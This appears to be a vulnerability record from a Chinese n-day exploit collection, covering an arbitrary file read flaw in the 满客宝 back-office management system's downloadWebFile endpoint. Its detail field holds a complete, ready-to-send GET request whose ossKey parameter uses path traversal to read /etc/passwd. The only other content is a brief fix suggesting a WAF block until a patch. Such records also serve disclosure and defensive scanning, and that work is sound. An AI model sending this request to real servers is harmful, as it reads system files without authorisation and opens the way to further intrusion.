vendor = "满客宝"
name = "满客宝后台管理系统downloadWebFile存在任意文件读取漏洞"
type = "任意文件读取"
version = "未知"
path = "/base/api/v1/kitchenVideo/downloadWebFile.swagger"
detail = "GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Connection: close"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
